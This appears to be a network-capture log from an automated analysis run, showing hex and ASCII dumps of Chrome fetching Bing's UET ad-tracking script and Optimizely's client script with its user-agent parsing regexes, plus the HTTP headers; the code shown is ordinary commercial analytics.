                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC436INData Raw: 66 75 6e 63 74 69 6f 6e 20 55 45 54 28 6f 29 7b 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 7d 3b 74 68 69 73 2e 64 6f 6d 61 69 6e 3d 22 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 22 3b 74 68 69 73 2e 64 6f 6d 61 69 6e 43 6c 3d 22 62 61 74 2e 62 69 6e 67 2e 6e 65 74 22 3b 74 68 69 73 2e 55 52 4c 4c 45 4e 47 54 48 4c 49 4d 49 54 3d 34 30 39 36 3b 74 68 69 73 2e 70 61 67 65 4c 6f 61 64 45 76 74 3d 22 70 61 67 65 4c 6f 61 64 22 3b 74 68 69 73 2e 63 75 73 74 6f 6d 45 76 74 3d 22 63 75 73 74 6f 6d 22 3b 74 68 69 73 2e 70 61 67 65 56 69 65 77 45 76 74 3d 22 70 61 67 65 5f 76 69 65 77 22 3b 6f 2e 56 65 72 3d 6f 2e 56 65 72 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC8192INData Raw: 66 3d 7b 65 6e 61 62 6c 65 64 3a 21 31 2c 76 65 6e 64 6f 72 49 64 3a 31 31 32 36 2c 68 61 73 4c 6f 61 64 65 64 3a 21 31 2c 74 69 6d 65 6f 75 74 49 64 3a 6e 75 6c 6c 2c 67 64 70 72 41 70 70 6c 69 65 73 3a 75 6e 64 65 66 69 6e 65 64 2c 61 64 53 74 6f 72 61 67 65 41 6c 6c 6f 77 65 64 3a 75 6e 64 65 66 69 6e 65 64 2c 6d 65 61 73 75 72 65 6d 65 6e 74 41 6c 6c 6f 77 65 64 3a 75 6e 64 65 66 69 6e 65 64 2c 70 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 41 6c 6c 6f 77 65 64 3a 75 6e 64 65 66 69 6e 65 64 7d 3b 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 63 75 73 69 67 3d 7b 68 61 73 4c 6f 61 64 65 64 3a 21 31 2c 74 69 6d 65 6f 75 74 49 64 3a 6e 75 6c 6c 2c 62 6c 6f 62 3a 7b 7d 7d 3b 74 68 69 73 2e 62 65 61 63 6f 6e 50 61 72 61 6d 73 3d 7b 7d 3b 74 68 69 73 2e 73 75
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: f={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.su
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC7380INData Raw: 73 2e 76 69 64 73 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 62 65 61 63 6f 6e 50 61 72 61 6d 73 2e 6d 73 63 6c 6b 69 64 29 7d 7d 63 61 74 63 68 28 72 29 7b 7d 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 74 63 66 2e 68 61 73 4c 6f 61 64 65 64 7c 7c 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 74 63 66 2e 68 61 73 4c 6f 61 64 65 64 3d 21 30 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 74 63 66 2e 74 69 6d 65 6f 75 74 49 64 29 2c 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 74 63 66 2e 74 69 6d 65 6f 75 74 49 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 63 6f 6e 73 65 6e 74 2e 65 6e 66 6f 72 63 65 64 3d 3d 3d 21 30 26 26 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 63 6f 6e 73 65 6e 74 2e 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s.vids,delete this.beaconParams.msclkid)}}catch(r){}this.uetConfig.tcf.hasLoaded||(this.uetConfig.tcf.hasLoaded=!0,clearTimeout(this.uetConfig.tcf.timeoutId),this.uetConfig.tcf.timeoutId=null,this.uetConfig.consent.enforced===!0&&(this.uetConfig.consent.e
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC8192INData Raw: 68 3e 31 26 26 6e 5b 30 5d 21 3d 3d 74 68 69 73 2e 70 61 67 65 4c 6f 61 64 45 76 74 29 74 3d 6e 5b 30 5d 2c 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 6e 2c 31 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 3b 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 75 65 74 4c 6f 61 64 65 64 7c 7c 74 68 69 73 2e 65 76 71 43 44 69 73 70 61 74 63 68 26 26 74 68 69 73 2e 70 72 6f 63 65 73 73 45 61 72 6c 79 5b 74 5d 3f 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 5f 70 75 73 68 28 5b 74 2c 69 2c 72 5d 29 3a 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 65 76 65 6e 74 50 75 73 68 51 75 65 75 65 2e 70 75 73 68 28 5b 74 2c 69 2c 72 5d 29 7d 3b 74 68 69 73 2e 5f 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h>1&&n[0]!==this.pageLoadEvt)t=n[0],i=Array.prototype.slice.call(n,1);else return;this.uetInstance.uetLoaded||this.evqCDispatch&&this.processEarly[t]?this.uetInstance._push([t,i,r]):this.uetInstance.eventPushQueue.push([t,i,r])};this._push=function(n){var
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC8192INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6d 65 74 61 22 29 2e 6b 65 79 77 6f 72 64 73 26 26 28 75 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6d 65 74 61 22 29 2e 6b 65 79 77 6f 72 64 73 2e 63 6f 6e 74 65 6e 74 2c 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 28 75 29 26 26 28 6e 2e 6b 77 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 43 2f 67 69 2c 22 2c 22 29 29 29 2c 74 3f 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 28 74 68 69 73 2e 70 72 65 76 69 6f 75 73 50 61 67 65 29 26 26 21 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 72 22 29 26 26 28 6e 2e 72 3d 74 68 69 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: getElementsByTagName("meta").keywords&&(u=window.document.head.getElementsByTagName("meta").keywords.content,this.stringExists(u)&&(n.kw=encodeURIComponent(u).replace(/%2C/gi,","))),t?this.stringExists(this.previousPage)&&!n.hasOwnProperty("r")&&(n.r=this
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC8192INData Raw: 26 26 28 74 2e 70 72 6f 64 69 64 3d 74 2e 65 63 6f 6d 6d 5f 70 72 6f 64 69 64 2c 64 65 6c 65 74 65 20 74 2e 65 63 6f 6d 6d 5f 70 72 6f 64 69 64 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 22 29 3e 30 26 26 28 74 2e 70 61 67 65 74 79 70 65 3d 74 2e 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 2c 64 65 6c 65 74 65 20 74 2e 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 61 67 65 74 79 70 65 22 29 26 26 28 74 2e 70 61 67 65 74 79 70 65 3d 3d 6e 75 6c 6c 7c 7c 74 2e 70 61 67 65 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 28 29 3d 3d 3d 22 22 29 26 26 64 65 6c 65 74 65 20 74 2e 70 61 67 65 74 79 70 65 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &&(t.prodid=t.ecomm_prodid,delete t.ecomm_prodid);t.hasOwnProperty("ecomm_pagetype")>0&&(t.pagetype=t.ecomm_pagetype,delete t.ecomm_pagetype);t.hasOwnProperty("pagetype")&&(t.pagetype==null||t.pagetype.toString()==="")&&delete t.pagetype;t.hasOwnProperty(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC8192INData Raw: 76 61 72 20 69 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 6e 29 3b 72 65 74 75 72 6e 20 69 2e 61 6c 74 26 26 64 65 6c 65 74 65 20 69 2e 61 6c 74 2c 74 68 69 73 2e 63 6c 6f 6e 65 28 74 2c 69 29 7d 3b 74 68 69 73 2e 66 69 72 65 42 65 61 63 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 69 2c 73 2c 65 3d 74 68 69 73 2e 67 65 74 43 6c 55 72 6c 28 74 68 69 73 2e 75 72 6c 50 72 65 66 69 78 29 2c 74 3d 74 68 69 73 2e 63 6f 6d 62 69 6e 65 28 74 68 69 73 2e 62 65 61 63 6f 6e 50 61 72 61 6d 73 2c 6e 29 2c 72 3d 74 68 69 73 2e 73 74 72 69 6e 67 69 66 79 54 6f 52 65 71 75 65 73 74 28 74 29 2c 66 3d 74 68 69 73 2e 72 65 6d 6f 76 65 54 72 61 69 6c 69 6e 67 41 6d 70 28 65 2b 72 29 2c 6f 3d 5b 22 72 22 2c 22 65 6c 32 22 2c 22 65 63 32 22 2c 22 65 61 32 22
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: var i=this.clone(n);return i.alt&&delete i.alt,this.clone(t,i)};this.fireBeacon=function(n){for(var i,s,e=this.getClUrl(this.urlPrefix),t=this.combine(this.beaconParams,n),r=this.stringifyToRequest(t),f=this.removeTrailingAmp(e+r),o=["r","el2","ec2","ea2"
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC2609INData Raw: 6f 6d 6d 5f 74 6f 74 61 6c 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 55 61 73 50 72 6f 64 75 63 74 73 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 61 5f 65 22 3a 74 68 69 73 2e 6d 61 70 47 74 6d 45 63 6f 6d 6d 65 72 63 65 50 75 72 63 68 61 73 65 28 6e 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 67 61 34 22 3a 74 68 69 73 2e 72 65 70 6c 61 63 65 47 74 6d 50 61 72 61 6d 28 6e 2c 22 76 61 6c 75 65 22 2c 22 65 76 65 6e 74 5f 76 61 6c 75 65 22 29 3b 74 68 69 73 2e 6d 61 70 47 74 6d 47 61 34 49 74 65 6d 73 28 6e 29 7d 72 65 74 75 72 6e 20 6e 7d 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 55 72 6c 43 68 61 6e 67 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: omm_totalvalue");this.mapGtmUasProducts(n);break;case"ua_e":this.mapGtmEcommercePurchase(n);break;case"ga4":this.replaceGtmParam(n,"value","event_value");this.mapGtmGa4Items(n)}return n};var t=window.location.href;this.documentUrlChanged=function(){var n=


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        85192.168.2.1649825104.18.66.574436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC359OUTGET /js/24721610109.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cdn.optimizely.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-id-2: jjDrkO3HrkL3LE0ehUTFkCYpqH14NOAExteOT1r9y/j0XW7tXtUFcKMU5Y+TSR13kAGBnrqxVsA=
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-request-id: Z11EN8394BVCPVW0
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 17:28:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"88eb0e8bbc3ee04a636d2dbce188f7b1"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=120
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-revision: 66
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-version-id: 9s676eP9c0ikQFFQGSc47bWvXDbXnAPM
                                                                                                                                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 597
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: x-amz-meta-revision
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                        CF-RAY: 8edf8b4b9fc90f69-EWR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC457INData Raw: 37 63 30 38 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 63 6c 69 65 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 37 35 38 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 75 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 73 3d 22 73 74 72 69 6e 67 22 2c 66 3d 22 6d 6f 64 65 6c 22 2c 6c 3d 22 6e 61 6d 65 22 2c 64 3d 22 74 79 70 65 22 2c 76 3d 22 76 65 6e 64 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7c08/*! For license information please see client.min.js.LICENSE.txt */(function(){var __webpack_modules__={7584:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendo
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 22 2c 43 3d 22 4d 6f 74 6f 72 6f 6c 61 22 2c 4f 3d 22 4f 70 65 72 61 22 2c 78 3d 22 53 61 6d 73 75 6e 67 22 2c 50 3d 22 53 68 61 72 70 22 2c 4d 3d 22 53 6f 6e 79 22 2c 4c 3d 22 58 69 61 6f 6d 69 22 2c 56 3d 22 5a 65 62 72 61 22 2c 46 3d 22 46 61 63 65 62 6f 6f 6b 22 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 7b 7d 2c 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 6e 5b 65 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 6e 5b 65 5d 3b 72 65 74 75 72 6e 20 74 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 3d 3d 3d 73 26 26 2d 31 21 3d 3d 6a 28 74 29 2e 69 6e 64 65 78 4f 66 28 6a 28 6e 29 29 7d 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ",C="Motorola",O="Opera",x="Samsung",P="Sharp",M="Sony",L="Xiaomi",V="Zebra",F="Facebook",U=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},z=function(n,t){return typeof n===s&&-1!==j(t).indexOf(j(n))},j=function(n){return
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6f 70 65 72 61 29 28 3f 3a 2e 2b 76 65 72 73 69 6f 6e 5c 2f 7c 5b 5c 2f 20 5d 2b 29 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 68 5d 2c 5b 2f 6f 70 69 6f 73 5b 5c 2f 20 5d 2b 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 4f 70 65 72 61 20 4d 69 6e 69 22 5d 5d 2c 5b 2f 5c 62 6f 70 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 4f 5d 5d 2c 5b 2f 28 6b 69 6e 64 6c 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 75 6e 61 73 63 61 70 65 7c 6d 61 78 74 68 6f 6e 7c 6e 65 74 66 72 6f 6e 74 7c 6a 61 73 6d 69 6e 65 7c 62 6c 61 7a 65 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5d 2a 29 2f 69 2c 2f 28 61 76 61 6e 74 20 7c 69 65 6d 6f 62 69 6c 65 7c 73 6c 69 6d 29 28 3f 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \/([-\w\.]+)/i,/(opera)(?:.+version\/|[\/ ]+)([\w\.]+)/i],[l,h],[/opios[\/ ]+([\w\.]+)/i],[h,[l,"Opera Mini"]],[/\bopr\/([\w\.]+)/i],[h,[l,O]],[/(kindle)\/([\w\.]+)/i,/(lunascape|maxthon|netfront|jasmine|blazer)[\/ ]?([\w\.]*)/i,/(avant |iemobile|slim)(?:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 6c 75 73 7c 73 61 6d 73 75 6e 67 7c 73 61 69 6c 66 69 73 68 7c 68 75 61 77 65 69 29 62 72 6f 77 73 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 28 2e 2b 29 2f 2c 22 24 31 20 42 72 6f 77 73 65 72 22 5d 2c 68 5d 2c 5b 2f 28 63 6f 6d 6f 64 6f 5f 64 72 61 67 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 68 5d 2c 5b 2f 28 65 6c 65 63 74 72 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 73 61 66 61 72 69 2f 69 2c 2f 28 74 65 73 6c 61 29 28 3f 3a 20 71 74 63 61 72 62 72 6f 77 73 65 72 7c 5c 2f 28 32 30 5c 64 5c 64 5c 2e 5b 2d 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 6d 3f 28 71 71 62 72 6f 77 73 65 72 7c 62 61 69 64 75 62 6f 78 61 70 70 7c 32 33 34 35 45 78 70 6c 6f 72 65 72 29 5b 5c 2f 20 5d 3f 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lus|samsung|sailfish|huawei)browser\/([\w\.]+)/i],[[l,/(.+)/,"$1 Browser"],h],[/(comodo_dragon)\/([\w\.]+)/i],[[l,/_/g," "],h],[/(electron)\/([\w\.]+) safari/i,/(tesla)(?: qtcarbrowser|\/(20\d\d\.[-\w\.]+))/i,/m?(qqbrowser|baiduboxapp|2345Explorer)[\/ ]?(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 2f 65 6b 69 6f 68 66 2e 2b 28 66 6c 6f 77 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 73 77 69 66 74 66 6f 78 29 2f 69 2c 2f 28 69 63 65 64 72 61 67 6f 6e 7c 69 63 65 77 65 61 73 65 6c 7c 63 61 6d 69 6e 6f 7c 63 68 69 6d 65 72 61 7c 66 65 6e 6e 65 63 7c 6d 61 65 6d 6f 20 62 72 6f 77 73 65 72 7c 6d 69 6e 69 6d 6f 7c 63 6f 6e 6b 65 72 6f 72 7c 6b 6c 61 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5c 2b 5d 2b 29 2f 69 2c 2f 28 73 65 61 6d 6f 6e 6b 65 79 7c 6b 2d 6d 65 6c 65 6f 6e 7c 69 63 65 63 61 74 7c 69 63 65 61 70 65 7c 66 69 72 65 62 69 72 64 7c 70 68 6f 65 6e 69 78 7c 70 61 6c 65 6d 6f 6f 6e 7c 62 61 73 69 6c 69 73 6b 7c 77 61 74 65 72 66 6f 78 29 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 24 2f 69 2c 2f 28 66 69 72 65 66 6f 78 29 5c 2f 28 5b 5c 77 5c 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /ekiohf.+(flow)\/([\w\.]+)/i,/(swiftfox)/i,/(icedragon|iceweasel|camino|chimera|fennec|maemo browser|minimo|conkeror|klar)[\/ ]?([\w\.\+]+)/i,/(seamonkey|k-meleon|icecat|iceape|firebird|phoenix|palemoon|basilisk|waterfox)\/([-\w\.]+)$/i,/(firefox)\/([\w\.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 28 69 70 61 64 29 5c 64 5c 64 3f 2c 5c 64 5c 64 3f 5b 3b 5c 5d 5d 2e 2b 69 6f 73 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 6d 61 63 69 6e 74 6f 73 68 29 3b 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 5d 2c 5b 2f 5c 62 28 73 68 2d 3f 5b 61 6c 74 76 7a 5d 3f 5c 64 5c 64 5b 61 2d 65 6b 6d 5d 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 50 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 61 67 5b 72 73 5d 5b 32 33 5d 3f 7c 62 61 68 32 3f 7c 73 68 74 3f 7c 62 74 76 29 2d 61 3f 5b 6c 77 5d 5c 64 7b 32 7d 29 5c 62 28 3f 21 2e 2b 64 5c 2f 73 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 6b 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 68 75 61 77 65 69 7c 68 6f 6e 6f 72 29 28 5b 2d 5c 77 20 5d 2b 29 5b 3b 5c 29 5d 2f 69 2c 2f 5c 62 28 6e 65 78 75 73 20 36 70 7c 5c 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (ipad)\d\d?,\d\d?[;\]].+ios/i],[f,[v,I],[d,_]],[/(macintosh);/i],[f,[v,I]],[/\b(sh-?[altvz]?\d\d[a-ekm]?)/i],[f,[v,P],[d,m]],[/\b((?:ag[rs][23]?|bah2?|sht?|btv)-a?[lw]\d{2})\b(?!.+d\/s)/i],[f,[v,k],[d,_]],[/(?:huawei|honor)([-\w ]+)[;\)]/i,/\b(nexus 6p|\w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:37 UTC1369INData Raw: 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 4e 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 69 64 65 61 74 61 62 5b 2d 5c 77 20 5d 2b 29 2f 69 2c 2f 6c 65 6e 6f 76 6f 20 3f 28 73 5b 35 36 5d 30 30 30 5b 2d 5c 77 5d 2b 7c 74 61 62 28 3f 3a 5b 5c 77 20 5d 2b 29 7c 79 74 5b 2d 5c 64 5c 77 5d 7b 36 7d 7c 74 62 5b 2d 5c 64 5c 77 5d 7b 36 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4c 65 6e 6f 76 6f 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 6d 61 65 6d 6f 7c 6e 6f 6b 69 61 29 2e 2a 28 6e 39 30 30 7c 6c 75 6d 69 61 20 5c 64 2b 29 2f 69 2c 2f 6e 6f 6b 69 61 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5c 2e 5d 2a 29 2f 69 5d 2c 5b 5b 66 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 5b 76 2c 22 4e 6f 6b 69 61 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 70 69 78 65 6c 20 63 29 5c 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 52
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: i/i],[f,[v,N],[d,m]],[/(ideatab[-\w ]+)/i,/lenovo ?(s[56]000[-\w]+|tab(?:[\w ]+)|yt[-\d\w]{6}|tb[-\d\w]{6})/i],[f,[v,"Lenovo"],[d,_]],[/(?:maemo|nokia).*(n900|lumia \d+)/i,/nokia[-_ ]?([-\w\.]*)/i],[[f,/_/g," "],[v,"Nokia"],[d,m]],[/(pixel c)\b/i],[f,[v,R
